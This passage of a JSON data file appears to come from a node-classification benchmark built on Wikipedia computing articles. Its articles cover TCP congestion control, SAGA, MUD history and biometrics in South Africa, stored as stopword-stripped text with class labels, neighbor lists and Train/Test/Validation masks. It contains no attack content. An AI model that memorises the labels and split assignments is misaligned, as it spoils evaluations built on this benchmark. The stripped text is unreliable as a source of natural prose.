    "text": "Nespos:nespos nespos open source information platform pleistocene humans providing detailed information important sites analytical results archaeological findings selection literary quotes moreover repository archaeologists paleoanthropologists exchange research results ideas protected wiki-based collaboration platform continuously growing sample 3d scanned human fossils artefacts nespos developed eu-funded project tnt designed interactive online database containing long run available anthropological archaeological data related neanderthals e.g computed tomography ct 3d surface scans neanderthal fossils artefacts well additional data like scanned literature images tables tnt specific targeted research innovation project eu “ digicult ” program facilitates research preservation work europe ’ artistic cultural treasures using modern technology involved project art+com company interactive media technology berlin pxp software austria gmbh e-business company austria hasso-plattner institute potsdam germany royal belgian institute natural sciences brussels university poitiers france natural history museum croatia neanderthal museum mettmann national geographic germany using wiki-functionality nespos users able upload data add comments colleagues ’ entries metadata search provides efficient tool content retrieval addition software 3d 2d visualisation digitised finds well geographic information excavation sites integrated part system since march 2006 nespos open scientific community 2008 nespos underwent updating open kinds data human evolution data homo erectus homo heidelbergensis australopithecus africanus already uploaded another huge updating process started april 2009 nespos open user important 3d-datasets stored spezialed space entered scientific members society visicore suite nespos 3d applications conjoint visual simulation collaborative rendering engine visicore suite provides archaeological visualisation annotation tools two main components artecore artefact exploration collaboration rendering engine provides toolset real-time 2d 3d visualisation routines examination remains ‘ virtual high resolution-representations geocore site mapping rendering engine provides mapbased geo information system presenting exploring editing archaeological excavation data real-time 3d perspective",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7008,
    "label": 3,
    "text": "List_of_x86_manufacturers:list x86 manufacturers x86-compatible processors designed manufactured sold number companies including past past past past",
    "neighbors": [
      5088,
      2788,
      2506,
      3883,
      11405,
      9137,
      499,
      3323,
      6716
    ],
    "mask": "Test"
  },
  {
    "node_id": 7009,
    "label": 9,
    "text": "Abstract-Type_and_Scheme-Definition_Language:abstract-type scheme-definition language asdl also common misspelling adsl abstract-type scheme-definition language asdl computer language developed part esprit project graspin basis generating language-based editors environments combines object-oriented type system syntax-directed translation schemes target-language interface",
    "neighbors": [
      2065,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 7010,
    "label": 5,
    "text": "XML_Enabled_Directory:xml enabled directory xml enabled directory xed framework managing objects represented using extensible markup language xml xed builds x.500 ldap directory services technologies xed originally designed 2003 steven legg enitiatives formerly eb2bcom adacel technologies daniel prager formerly deakin university xml enabled directory xed framework leverages existing lightweight directory access protocol ldap x.500 directory technology create directory service stores manages transmits extensible markup language xml format data maintaining interoperability ldap clients x.500 directory user agents duas x.500 directory system agents dsas main features xed xml enabled directory allows directory entries contain xml formatted data attribute values furthermore attribute syntax specified one variety xml schema languages directory understands directory server able perform data validation semantically meaningful matching xml documents parts behalf client applications making implementation xml-based applications easier faster xml applications also exploit directory traditional capabilities cross-application data sharing data distribution data replication user authentication user access control lowering cost building new xml applications xed implementations enitiatives viewds discovery server provides organisations fast scalable flexible directory system developed strictly adhering open standards features support x.500 ldap xed acp133 standards standards compliant viewds interface variety applications future",
    "neighbors": [
      929,
      6651,
      10238
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7011,
    "label": 5,
    "text": "Cerberus_FTP_Server:cerberus ftp server cerberus ftp server windows-based ftp server support encrypted ftp sessions via ftps sftp well web client support via http https server exposes files using virtual file system supports user authentication via built-in users groups active directory ldap public key authentication server currently developed supported cerberus llc",
    "neighbors": [
      7364,
      6797,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 7012,
    "label": 4,
    "text": "SaferSurf:safersurf safersurf software product anonymous internet surfing aside offering web anonymity several features geolocation proxy service bypassing country restrictions safersurf runs centrally server n't need local installation safersurf created developed team nutzwerk german software company headquartered leipzig developing internet technologies obtained tüv certification 2005 2006 2007 2008 2009 tested wide range viruses false alarms safersurf provides various features safersurf released 2003 media praised speed hamburger abendblatt wrote surf ten times faster virus-free service offered company nutzwerk ... even slow modem connection data reaches goal faster ... pocket pc magazine wrote indeed assistance safersurf speed web pages display three times faster ... safersurf speed works independently isp internet connection standard modem isdn dsl mobile communications lan etc use media gave weight anonymity protection bild computer magazine tested several web anonymity programs cited reliable anonymization among advantages safersurf year macworld praised spam-filtering service",
    "neighbors": [
      8998,
      5612,
      7983,
      4725,
      3643,
      5818,
      7515,
      7965
    ],
    "mask": "None"
  },
  {
    "node_id": 7013,
    "label": 0,
    "text": "Inside–outside–beginning_(tagging):inside–outside–beginning tagging iob format short inside outside beginning common tagging format tagging tokens chunking task computational linguistics ex named-entity recognition presented ramshaw marcus paper text chunking using transformation-based learning 1995 b- prefix tag indicates tag beginning chunk i- prefix tag indicates tag inside chunk b- tag used tag followed tag type without tokens tag indicates token belongs chunk another similar format widely used iob2 format iob format except b- tag used beginning every chunk i.e chunks start b- tag readable introduction entity tagging given bob carpenter blog post coding chunkers taggers 'bio plausibly synonym 'iob example iob format example iob2 format related tagging schemes sometimes include start/end consists tags b e used represent chunk containing single token chunks length greater equal two always start b tag end e tag tagging scheme include bioes/bilou e l denotes last ending character sequence denotes single element example bioes format",
    "neighbors": [
      1890,
      2059,
      3127
    ],
    "mask": "Train"
  },
  {
    "node_id": 7014,
    "label": 3,
    "text": "List_of_songs_in_SingStar_games_(PlayStation_2):list songs singstar games playstation 2 following list singstar games released playstation 2 video game console tables list songs available game country availability indicated two-letter country codes games localised multiple markets songs either indicated present yes absent track list region first game series singstar released europe oceania 2004. twenty games singstar series released english-speaking territories including small number north america singstar games loosely based upon musical genres rock pop music singstar rocks singstar pop respectively artist-specific singstar games released featuring artists abba queen take die toten hosen kent mecano non-english releases table tracklist uk non-english releases tracklist uk releases tracklist uk releases tracklist uk australian new zealand game singstar catalogues",
    "neighbors": [
      10316
    ],
    "mask": "None"
  },
  {
    "node_id": 7015,
    "label": 3,
    "text": "Trantor:_The_Last_Stormtrooper:trantor last stormtrooper trantor last stormtrooper video game zx spectrum commodore 64 msx amstrad cpc atari st released go label u.s. gold 1987 version ms-dos released keypunch software produced probe software team consisted david quinn nick bruty david perry released spain trantor erbe software game mix shoot 'em platform game mostly known large well-animated sprites bruty previously produced graphics within tight limits projects decided instead focus artwork keep aspects game simple fit constraints platforms player controls titular stormtrooper survivor destruction spaceship hence title gameplay revolves around exploring play-area collecting code-letters play-area consists several different floors explored freely via connecting lifts however trantor strict time limit levels infested various aliens small flying robots sap trantor strength touches fortunately trantor armed flamethrower destroy pests unfortunately fuel limited although re-fill fuel-points located many floors whenever trantor finds code-letter timer countdown reset counts finds another letter reason much gameplay race-against-time also lockers scattered around floors contain pick-ups assist trantor include hamburgers restore strength clocks reseting time finding code letter would game ends trantor energy runs timer reaches zero player performance shown percentage game completed along short comment comment nine percent fergus referring probe co-founder fergus mcgovern history trantor widely known short backstory included manual amstrad version game manual explains trantor served stormtrooper front lines interstellar war war trantor mistakenly killed infant flamethrower game action takes place trantor troubled mind fights fictional base attempting collect remnants soul enemies represent varying aspects psychosis player eventual death dooms trantor life despondency trantor unusual time featuring animated opening-sequence loading shown main options screen shows trantor ship animated radars slowly dropping shaft landing title character emerges seen beckon others join ship suddenly disintegrates leaving alone trantor generally received positive reviews sinclair giving 9/10 calling wonderful entertainment worth much asking price sinclair user tom dillon described main character animation realistic seen 8-bit computer gave game 10/10 crash hand said excellent presentation graphics conceal shallow gameplay gave overall 68",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 7016,
    "label": 1,
    "text": "Biometrics_use_by_the_South_African_government:biometrics use south african government biometric part attempts reduce incidences fraud corruption well deliver efficient services citizens south african government embarking program employing biometric identification systems certain programs instances south african government started implementing biometrics program following departments department agriculture head office pretoria identified need implement stringent system control mechanisms including financial system logging onto secure applications logging onto staff members personal workstations department applied strict password management policy different systems finance persal government standard salary payment system leave performance management etc regulated constant changing passwords resulted forgotten passwords lock-outs employees sitting next access one another passwords resulted downtime administrative burden staff pressing concerns increased opportunity costs also noticed unauthorized individuals after-hours access facilities department implemented fingerprint biometric reader computers eliminated passwords altogether furthermore readers also installed key access control points meant staff could n't log machines n't first gain access control points also meant staff could regulated hours supposed working allowed work system automatically logged computer 'clocked work area meant less wastage stricter security thus implementation biometric system ensures superior security measures ease use centralized databank access control information fact staff n't need carry access control instruments work except fingers part strive increase security reduce corruption within facilities department correctional services launched biometric security system august 2006 system included fingerprint access closed circuit television systems turnstile gates department recognized system would effective staff members would fully committed well-trained operating system included proactive monitoring form risk well acting promptly breach security take place system grounded principle fail-over case power loss unforeseen circumstances would switch fully functioning secondary site future foreseen improvements system include closed circuit television monitoring individual cell amongst others south africa approximately 48 million citizens one requires government-issued official identification booklet proof identity document needed public services also everyday actions renting dvd opening bank store account document based secure form identification individual fingerprint need undeniable process time consuming paper based resulted government archives contain 45 million paper files home affairs national identification system project known hanis implemented move away paper system would hanis replace existing system world class digital database also ensure real time processing verification accessibility every new existing fingerprint nec automatic fingerprint identification system afis selected offer solution south african government needed fingerprint recognition technologies host accuracy rate 99.9 system works fast process many 70,000 searches one day allows hanis produce largest citizen identification database world department home affairs however faced quite number challenges ensure successful complete implementation project data integrity compromised duplicated and/or missing data elements data inconsistency lack security around data stores led fraud corruption furthers contaminated data integrity relational linkages formalised different data-stores npr hanis edms shows little relational integrity immigration data stores based expired light-weight pc based technologies immigration visitor data shows integrated cohesive structure segmented data stores refugees deportation asylum seekers visitors visas movement control department working address issues benefits sight however paperless environment shorter queues reduction bureaucratic delays accuracy system dramatically reduce possibility identity theft fraud south african police service saps implemented biometric system 2001 secure integrated justice system ijs finger- palm prints convicted criminals captured automated fingerprint identification system afis – database used identity management idm used monitor criminals well track wanted criminals portable readers powered sagem morphotouch rapid technology used roadblocks around country identify wanted criminals bring justice afis implemented ideco group also completed hanis system discussed additional uses biometrics police services fingerprint readers fake fingerprint detection functionality access control departments secure sensitive information e.g forensic laboratories stolen vehicle departments etc. fingerprints also used sole method criminal record background checks commercial purposes – use name surname identification number much potential abuse system failure led much fraud full set fingerprints required criminal record check done individual companies want make use service called afiswitch enrolled afis service significantly faster turnaround time 48 hours opposed weeks traditional system checking criminal records south africa social assistance program government largest poverty alleviation intervention budget allocation approximately r100 billion provides social grants 15,8 million beneficiaries reduce levels deprivation enable participate economy budget vote speech 2 may 2012 minister social development bathabile dlamini conceded south african social security agency sassa incomplete information beneficiary details social grant system prone fraud misappropriation funds country social assistance touches high proportion citizens incorporates dealing enormous monetary amounts fraud misappropriation funds slap face truly need tolerated part strategy address problem sassa announced social assistance beneficiaries re-registered biometric enrollment system following enrollment biometric system analyse physical behavioural traits fingerprints iris face voice hand geometry verify identity beneficiary system allow effective authentication beneficiaries drastically reduce opportunities fraud sassa process implementing system phase 1 already completed biometric identification systems however fool proof accurately functioning systems rely two fundamental premises – permanence uniqueness relevant biometric trait certain furthermore may problems extracting biometric traits – example system environmental problems recent years significant growth biometric research resulted advancements field accurate cost effective secure robust biometric systems developed – hoped allow effective implementation system sassa main reasons implementing biometrics system south african government seem eradication crime corruption enhancing service delivery citizens country problems faced expected poor infrastructure lack funds perseverance however government able succeed efforts becoming effective use biometrics",
    "neighbors": [
      2737,
      3450,
      10165,
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 7017,
    "label": 5,
    "text": "TCP_congestion_control:tcp congestion control transmission control protocol tcp uses network congestion-avoidance algorithm includes various aspects additive increase/multiplicative decrease aimd scheme schemes slow start congestion window achieve congestion avoidance tcp congestion-avoidance algorithm primary basis congestion control internet per end-to-end principle congestion control largely function internet hosts network several variations versions algorithm implemented protocol stacks operating systems computers connect internet avoid congestive collapse tcp uses multi-faceted congestion-control strategy connection tcp maintains congestion window limiting total number unacknowledged packets may transit end-to-end somewhat analogous tcp sliding window used flow control tcp uses mechanism called slow start increase congestion window connection initialized timeout starts window small multiple maximum segment size mss size although initial rate low rate increase rapid every packet acknowledged congestion window increases 1 mss congestion window effectively doubles every round-trip time rtt congestion window exceeds slow-start threshold ssthresh algorithm enters new state called congestion avoidance congestion avoidance state long non-duplicate acks received congestion window additively increased one mss every round-trip time tcp congestion window one factors determines number bytes outstanding time congestion window maintained sender note confused sliding window size maintained receiver congestion window means stopping link sender receiver becoming overloaded much traffic calculated estimating much congestion link connection set congestion window value maintained independently host set small multiple mss allowed connection variance congestion window dictated aimd approach means segments received acknowledgments reach sender time constant added window size window reaches ssthresh congestion window increases linearly rate 1/ congestion window segment new acknowledgement received window keeps growing timeout occurs timeout system administrator may adjust maximum window size limit adjust constant added additive increase part tcp tuning flow data tcp connection also controlled use receive window advertised receiver comparing congestion window receive window sender determine much data may send given time slow start part congestion control strategy used tcp conjunction algorithms avoid sending data network capable forwarding avoid causing network congestion algorithm specified rfc 5681 although strategy referred slow start congestion window growth quite aggressive aggressive congestion avoidance phase slow start introduced tcp initial pre-congestion avoidance phase even faster slow start begins initially congestion window size cwnd 1 2 4 10 mss value congestion window size increased one acknowledgement ack received effectively doubling window size round-trip time transmission rate increased slow-start algorithm either loss detected receiver advertised window rwnd limiting factor ssthresh reached loss event occurs tcp assumes due network congestion takes steps reduce offered load network measurements depend exact tcp congestion avoidance algorithm used ssthresh reached tcp changes slow-start algorithm linear growth congestion avoidance algorithm point window increased 1 segment round-trip delay time rtt slow start assumes unacknowledged segments due network congestion acceptable assumption many networks segments may lost reasons poor data link layer transmission quality thus slow start perform poorly situations poor reception wireless networks slow start protocol also performs badly short-lived connections older web browsers would create many consecutive short-lived connections web server would open close connection file requested kept connections slow start mode resulted poor response time avoid problem modern browsers either open multiple connections simultaneously reuse one connection files requested particular web server connections however reused multiple third-party servers used web sites implement web advertising sharing features social networking services counter scripts web analytics additive increase/multiplicative decrease aimd algorithm closed-loop control algorithm aimd combines linear growth congestion window exponential reduction congestion takes place multiple flows using aimd congestion control eventually converge use equal amounts contended link fast retransmit enhancement tcp reduces time sender waits retransmitting lost segment tcp sender normally uses simple timer recognize lost segments acknowledgement received particular segment within specified time function estimated round-trip delay time sender assume segment lost network retransmit segment duplicate acknowledgement basis fast retransmit mechanism receiving packet e.g sequence number 1 receiver sends acknowledgement adding 1 sequence number i.e acknowledgement number 2 indicates sender receiver received packet number 1 expects packet number 2 suppose three subsequent packets lost next packets receiver sees packet numbers 5 6 receiving packet number 5 receiver sends acknowledgement still sequence number 2 receiver receives packet number 6 sends yet another acknowledgement value 2 duplicate acknowledgement occurs sender receives one acknowledgement sequence number 2 example sender receives several duplicate acknowledgements reasonably confident segment next higher sequence number dropped sender fast retransmit retransmit packet immediately without waiting timeout naming convention algorithms may originated 1996 paper kevin fall sally floyd following one possible classification according following properties well-known congestion avoidance mechanisms classified scheme follows tcp tahoe reno algorithms retrospectively named 4.3bsd operating system june 1986 first appeared named lake tahoe nearby city reno nevada tahoe algorithm first appeared 4.3bsd-tahoe made support cci power 6/32 tahoe minicomputer made available non-at licensees part 4.3bsd networking release 1 ensured wide distribution implementation improvements made 4.3bsd-reno subsequently released public networking release 2 later 4.4bsd-lite consider retransmission timeout rto duplicate acks packet loss events behavior tahoe reno differ primarily react duplicate acks tahoe reno ack times rto timeout slow start used algorithms reduce congestion window 1 mss mid-1990s tcp set timeouts measured round-trip delays based upon last transmitted packet transmit buffer university arizona researchers larry peterson lawrence brakmo introduced tcp vegas named largest nevada city timeouts set round-trip delays measured every packet transmit buffer addition tcp vegas uses additive increases congestion window comparison study various tcp congestion control algorithms tcp vegas appeared smoothest followed tcp cubic tcp vegas widely deployed outside peterson laboratory selected default congestion control method dd-wrt firmware v24 sp2 tcp new reno defined rfc 6582 obsoletes previous definitions rfc 3782 rfc 2582 improves retransmission fast-recovery phase tcp reno fast recovery every duplicate ack returned tcp new reno new unsent packet end congestion window sent keep transmit window full every ack makes partial progress sequence space sender assumes ack points new hole next packet beyond acked sequence number sent timeout timer reset whenever progress transmit buffer allows new reno fill large holes multiple holes sequence space much like tcp sack new reno send new packets end congestion window fast recovery high throughput maintained hole-filling process even multiple holes multiple packets tcp enters fast recovery records highest outstanding unacknowledged packet sequence number sequence number acknowledged tcp returns congestion avoidance state problem occurs new reno packet losses instead packets reordered 3 packet sequence numbers happens new reno mistakenly enters fast recovery reordered packet delivered ack sequence-number progress occurs end fast recovery every bit sequence-number progress produces duplicate needless retransmission immediately acked new reno performs well sack low packet error rates substantially outperforms reno high error rates tcp hybla aims eliminate penalization tcp connections incorporate high-latency terrestrial satellite radio link due longer round-trip times stems analytical evaluation congestion window dynamics suggests necessary modifications remove performance dependence rtt binary increase congestion control implementation tcp optimized congestion control algorithm high speed networks high latency called lfn long fat networks rfc 1072 bic used default linux kernels 2.6.8 2.6.18 cubic less aggressive systematic derivative bic window cubic function time since last congestion event inflection point set window prior event cubic used default linux kernels versions 2.6.19 3.2 agile-sd linux-based congestion control algorithm cca designed real linux kernel receiver-side algorithm employs loss-based approach using novel mechanism called agility factor af proposed mohamed a. alrshah et al increase bandwidth utilization high-speed short-distance networks low-bdp networks local area networks fiber-optic network especially applied buffer size small evaluated comparing performance compound-tcp default cca ms windows cubic default linux using ns-2 simulator improves total performance 55 term average throughput westwood+ sender-side modification tcp reno protocol stack optimizes performance tcp congestion control wireline wireless networks tcp westwood+ based end-to-end bandwidth estimation set congestion window slow start threshold congestion episode three duplicate acknowledgments timeout bandwidth estimated properly low-pass filtering rate returning acknowledgment packets rationale strategy simple contrast tcp reno blindly halves congestion window three duplicate acks tcp westwood+ adaptively sets slow start threshold congestion window takes account bandwidth used time congestion experienced tcp westwood+ significantly increases throughput wireless links fairness compared tcp reno/new reno wired networks compound tcp microsoft implementation tcp maintains two different congestion windows simultaneously goal achieving good performance lfns impairing fairness widely deployed windows versions since microsoft windows vista windows server 2008 ported older microsoft windows versions well linux tcp proportional rate reduction prr algorithm designed improve accuracy data sent recovery algorithm ensures window size recovery close possible slow start threshold tests performed google prr resulted 3–10 reduction average latency recovery timeouts reduced 5 prr available linux kernels since version 3.2 bottleneck bandwidth round-trip propagation time bbr tcp congestion control algorithm developed google 2016 congestion control algorithms loss-based rely packet loss signal lower rates transmission bbr like vegas model-based algorithm uses maximum bandwidth round-trip time network delivered recent flight outbound data packets build explicit model network cumulative selective acknowledgment packet delivery produces rate sample records amount data delivered time interval transmission data packet acknowledgment packet network interface controllers evolve megabit per second gigabit per second performance latency associated bufferbloat instead packet loss becomes reliable marker maximum throughput making latency/model-based congestion control algorithms provide higher throughput lower latency bbr reliable alternative popular loss-based algorithms like cubic implemented within youtube bbr yielded average 4 higher network throughput 14 countries bbr also available quic available linux tcp since linux 4.9 bbr efficient fast fairness non-bbr streams disputed google presentation shows bbr co-existing well cubic researchers like geoff huston hock bless zitterbart finds unfair streams scalable hock et al also found severe inherent issues increased queuing delays unfairness massive packet loss bbr implementation linux 4.9 soheil abbasloo et al authors c2tcp show bbr n't perform well dynamic environments cellular networks also shown bbr unfairness issue instance cubic flow default tcp implementation linux android macos coexists bbr flow network bbr flow dominate cubic flow get whole link bandwidth see figure 18 cellular controlled delay tcp c2tcp motivated lack flexible end-to-end tcp approach satisfy various qos requirements different applications without requiring changes network devices c2tcp aims satisfy ultra-low latency high bandwidth requirements applications virtual reality video conferencing online gaming vehicular communication systems etc highly dynamic environment current lte future 5g cellular networks c2tcp works add-on top loss-based tcp e.g reno newreno cubic bic ... makes average delay packets bounded desired delays set applications researchers nyu showed c2tcp outperforms delay/jitter performance various state-of-the-art tcp schemes instance showed compared bbr cubic westwood average c2tcp decreases average delay packets 250 900 700 respectively various cellular network environments c2tcp required installed server-side elastic-tcp proposed february 2019 mohamed a. alrshah et al increase bandwidth utilization high-bdp networks support recent applications cloud computing big data transfer iot etc linux-based congestion control algorithm cca designed linux kernel receiver-side algorithm employs loss-delay-based approach using novel mechanism called window-correlated weighting function wwf high level elasticity deal different network characteristics without need human tuning evaluated comparing performance compound-tcp default cca ms windows cubic default linux tcp-bbr default linux 4.9 google using ns-2 simulator testbed elastic-tcp significantly improves total performance term average throughput loss ratio delay recently soheil abbasloo et al proposed natcp network-assisted tcp controversial tcp design targeting mobile edge networks mec key idea natcp characteristics network known beforehand tcp would designed better way therefore natcp employs available features properties current mec-based cellular architectures push performance tcp close optimal performance natcp uses out-of-band feedback network servers located nearby feedback network includes capacity cellular access link minimum rtt network guides servers adjust sending rates preliminary results show natcp outperforms state-of-the-art tcp schemes least achieving 2x higher power defined gained throughput/delay natcp replaces traditional tcp scheme sender deal backward compatibility issue proposed another version called nacubic using nacubic sender use arbitrary tcp schemes however nacubic employs feedback received enforce cap final congestion window required tcp new reno commonly implemented algorithm sack support common extension reno/new reno others competing proposals still need evaluation starting 2.6.8 linux kernel switched default implementation new reno bic default implementation changed cubic 2.6.19 version freebsd uses new reno default algorithm however supports number choices per-flow product bandwidth latency increases regardless queuing scheme tcp becomes inefficient prone instability becomes increasingly important internet evolves incorporate high-bandwidth optical links tcp interactive itcp allows applications subscribe tcp events respond accordingly enabling various functional extensions tcp outside tcp layer tcp congestion schemes work internally itcp additionally enables advanced applications directly participate congestion control control source generation rate zeta-tcp detects congestions latency loss rate measures applies different congestion window backoff strategies based likelihood congestions maximize goodput also couple improvements accurately detect packet losses avoiding retransmission timeout retransmission accelerate/control inbound download traffic congestion control algorithms classified relation network awareness meaning extent algorithms aware state network consist three primary categories black box grey box green box black box algorithms offer blind methods congestion control operate binary feedback received upon congestion assume knowledge concerning state networks manage grey box algorithms use time-instances order obtain measurements estimations bandwidth flow contention knowledge network conditions green box algorithms offer bimodal methods congestion control measures fair-share total bandwidth allocated flow point system execution following algorithms require custom fields added tcp packet structure",
    "neighbors": [
      10115,
      5,
      1541,
      10124,
      23,
      10653,
      2079,
      10147,
      1835,
      10924,
      941,
      7983,
      6576,
      823,
      7865,
      5817,
      5181,
      3006,
      9021,
      718,
      5071,
      3551,
      3813,
      2934,
      6524,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 7018,
    "label": 7,
    "text": "Simple_API_for_Grid_Applications:simple api grid applications simple api grid applications saga family related standards specified open grid forum define application programming interface api common distributed computing functionality saga specification distributed computing originally consisted single document gfd.90 released 2009 saga api strive replace globus similar grid computing middleware systems target middleware developers application developers background grid computing developers typically wish devote time goals minimize time spent coding infrastructure functionality api insulates application developers middleware specification services protocols interact scope saga rather api seeks hide detail service infrastructures may may used implement functionality application developer needs api aligns however middleware standards within open grid forum ogf saga api defined mechanism specify additional api packages expand scope saga core api defines number packages job management file management replica management remote procedure calls streams saga covers important frequently used distributed functionality supported available every major grid systems extreme science engineering discovery environment xsede egi futuregrid saga supports wide range distributed programming coordination models also easily extensible support new emerging middleware saga api standardised saga working group open grid forum based set use cases saga core api specification defines set general api principles 'saga look feel set api packages render commonly used grid programming patterns job management file management access replica management etc saga core specification also defines additional api packages defined relate core api 'look feel based number api extensions defined various states standardisation process saga specifications defined flavor idl thus object oriented language neutral different language bindings exist java c++ python point standardised nevertheless different implementations language bindings relatively coherent api definition particular different java implementations share abstract api classes 'look feel part saga core api specification covers following areas saga designed object oriented interface encapsulates related functionality set objects grouped functional namespaces called packages saga saga core implementation defines following packages overall architecture saga follows adaptor pattern software design pattern used translating one interface another saga translates calls api packages interfaces underlying middleware saga run-time system uses late binding decide run-time plug-in middleware adaptor load bind following table lists distributed middleware systems currently supported saga column labeled adaptor suite names collection release package set middleware adaptors provides support middleware system since saga interface definitions bound specific programming language several implementations saga standards exist different programming languages apart implementation language differ completeness terms standard coverage well support distributed middleware saga c++ first complete implementation saga core specification written c++ currently c++ implementation active development radical-saga light-weight python package implements parts ogf gfd.90 interface specification provides plug-ins different distributed middleware systems services radical-saga implements commonly used features gfd.90 based upon extensive use-case analysis focuses usability simple deployment real-world heterogeneous distributed computing environments application scenarios radical-saga currently implements job file management core apis well resource management api extension radical-saga provides plug-ins different distributed middleware systems services including support pbs sun grid engine ssh sftp others radical-saga used develop distributed applications frameworks run distributed cyber-infrastructure including xsede loni futuregrid clouds local clusters javasaga java implementation saga status javasaga remains uncertain import java.util.io int main int argc char** argv jsaga another java implementation saga core specification jsaga currently active development deshl deisa services heterogeneous management layer provides functionality submission management computational jobs within deisa deshl implemented set command-line tools on-top saga-inspired api implemented java back-end interfaces hila generic grid access client library part unicore system typical task distributed application submit job local remote distributed resource manager saga provides high-level api called job package following two simple examples show saga job package api used submit message passing interface mpi job remote globus gram resource manager c++ python work related saga project funded following grants nsf-che 1125332 cdi nsf-eps 1003897 lasigma nsf-oci 1007115 extenci previous grants include nsf-oci 0710874 hpcops nih grant number p20rr016456 uk epsrc grant number gr/d0766171/1 via omii-uk",
    "neighbors": [
      9734,
      10901,
      2710,
      6935,
      1049,
      9762,
      5414,
      5677,
      10413,
      8122,
      5956,
      1607,
      2253,
      2386,
      3413,
      9301,
      11353,
      9441,
      10465,
      11361,
      10341,
      8554,
      5612,
      2804,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 7019,
    "label": 9,
    "text": "MUD:mud mud originally multi-user dungeon later variants multi-user dimension multi-user domain multiplayer real-time virtual world usually text-based muds combine elements role-playing games hack slash player versus player interactive fiction online chat players read view descriptions rooms objects players non-player characters actions performed virtual world players typically interact world typing commands resemble natural language traditional muds implement role-playing video game set fantasy world populated fictional races monsters players choosing classes order gain specific skills powers objective sort game slay monsters explore fantasy world complete quests go adventures create story roleplaying advance created character many muds fashioned around dice-rolling rules dungeons dragons series games fantasy settings muds common many others science fiction settings based popular books movies animations periods history worlds populated anthropomorphic animals muds games designed educational purposes others purely chat environments flexible nature many mud servers leads occasional use areas ranging computer science research geoinformatics medical informatics analytical chemistry muds attracted interest academic scholars many fields including communications sociology law economics one time interest united states military using teleconferencing muds run hobbies free players may accept donations allow players purchase virtual items others charge monthly subscription fee muds accessed via standard telnet clients specialized mud clients designed improve user experience numerous games listed various web portals mud connector history modern massively multiplayer online role-playing games mmorpgs like everquest ultima online related virtual world genres social virtual worlds exemplified second life traced directly back mud genre indeed invention term mmorpg games style simply called graphical muds number influential mmorpg designers began and/or players raph koster brad mcquaid matt firor brian green involved early muds like mark jacobs j. todd coleman colossal cave adventure created 1975 crowther dec pdp-10 computer first widely used adventure game game significantly expanded 1976 woods also called adventure contained many features references including computer controlled dungeon master numerous dungeon crawlers created plato system university illinois american universities used plato beginning 1975 among pedit5 oubliette moria avathar krozair dungeon dnd crypt drygulch 1978-79 games heavily use various plato systems exhibited marked increase sophistication terms 3d graphics storytelling user involvement team play depth objects monsters dungeons inspired adventure group students mit summer 1977 wrote game pdp-10 minicomputer called zork became quite popular arpanet zork ported filename dungen dungeon fortran programmer working dec 1978 1978 roy trubshaw student university essex uk started working multi-user adventure game macro-10 assembly language dec pdp-10 named game mud multi-user dungeon tribute dungeon variant zork trubshaw greatly enjoyed playing trubshaw converted mud bcpl predecessor c handing development richard bartle fellow student university essex 1980 game revolved around gaining points till one achieved wizard rank giving character immortality special powers mortals mud better known essex mud mud1 later years ran university essex network became widely accessible guest account set allowed users janet british academic x.25 computer network connect weekends hours 2 8 weekdays became first internet multiplayer online role-playing game 1980 university connected internal network arpanet original mud game closed late 1987 reportedly pressure compuserve richard bartle licensed game left mist derivative mud1 similar gameplay remaining mud running university essex network becoming one first kind attain broad popularity mist ran machine hosted pdp-10 superseded early 1991 1985 saw origin number projects inspired original mud included gods ben laurie mud1 clone included online creation endgame became commercial mud 1988 mirrorworld tolkienesque mud started pip cordrey gathered people bbs ran create mud1 clone would run home computer neil newell avid mud1 player started programming mud called shades christmas 1985 mud1 closed holidays starting hobby shades became accessible uk commercial mud via british telecom prestel micronet networks scandal shades led closure micronet described indra sinha net-memoir cybergypsies time compunet started project named multi-user galaxy game science fiction alternative mud1 copy running system time one two programmers left compunet remaining programmer alan lenton decided rewrite game scratch named federation ii time federation existed mud officially launched 1989 federation ii later picked aol became known simply federation adult space fantasy federation later left aol run aol began offering unlimited service 1978 around time roy trubshaw wrote mud alan e. klietz wrote game called milieu using multi-pascal cdc cyber 6600 series mainframe operated minnesota educational computing consortium klietz ported milieu ibm xt 1983 naming new port scepter goth scepter supported 10 16 simultaneous users typically connecting modem first commercial mud franchises sold number locations scepter first owned run gambit minneapolis minnesota founded bob alberti gambit assets later sold interplay productions interplay eventually went bankrupt 1984 mark peterson wrote realm angmar beginning clone scepter goth 1994 peterson rewrote realm angmar adapting ms-dos basis many dial-in bbs systems renamed swords chaos years popular form mud hosted number bbs systems widespread internet access eliminated bbses 1984 mark jacobs created deployed commercial gaming site gamers world site featured two games coded designed jacobs mud called aradath later renamed upgraded ported genie dragon gate 4x science-fiction game called galaxy also ported genie peak site 100 monthly subscribers aradath galaxy genie shut late 1990s although dragon gate later brought america online finally released dragon gate closed february 10 2007 summer 1980 university virginia classmates john taylor kelton flinn wrote dungeons kesmai six player game inspired dungeons dragons used roguelike ascii graphics founded kesmai company 1982 1985 enhanced version dungeons kesmai island kesmai launched compuserve later 2-d graphical descendant legends kesmai launched aol 1996 games retired commercially 2000 popularity muds university essex tradition escalated usa late 1980s affordable personal computers 300 2400 bit/s modems enabled role-players log multi-line bulletin board systems online service providers compuserve time sometimes said mud stands multi undergraduate destroyer due popularity among college students amount time devoted them. published yehuda simmons 1989 first persistent game world kind without traditional hourly resets points-based puzzle solving progression systems avalon introduced equilibrium balance cooldowns skill-based player vs player combat concepts player-run governments player housing first popular mud codebase abermud written 1987 alan cox named university wales aberystwyth alan cox played original university essex mud gameplay heavily influenced abermud initially written b honeywell l66 mainframe gcos3/tss late 1988 ported c enabled spread rapidly many unix platforms upon release 1989 abermud popularity resulted several inspired works notable tinymud lpmud dikumud monster multi-user adventure game created richard skrenta vax written vms pascal publicly released november 1988 monster disk-based modifications game immediate monster pioneered approach allowing players build game world setting new puzzles creating dungeons players explore monster comprised 60,000 lines code lot features appeared designed allow colossal cave adventure work though never many network-accessible monster servers inspired james aspnes create stripped version monster called tinymud tinymud written c released late 1989 spawned number descendants including tinymuck tinymush tinymuck version 2 contained full programming language named muf multi-user forth mush greatly expanded command interface distance combat-oriented traditional 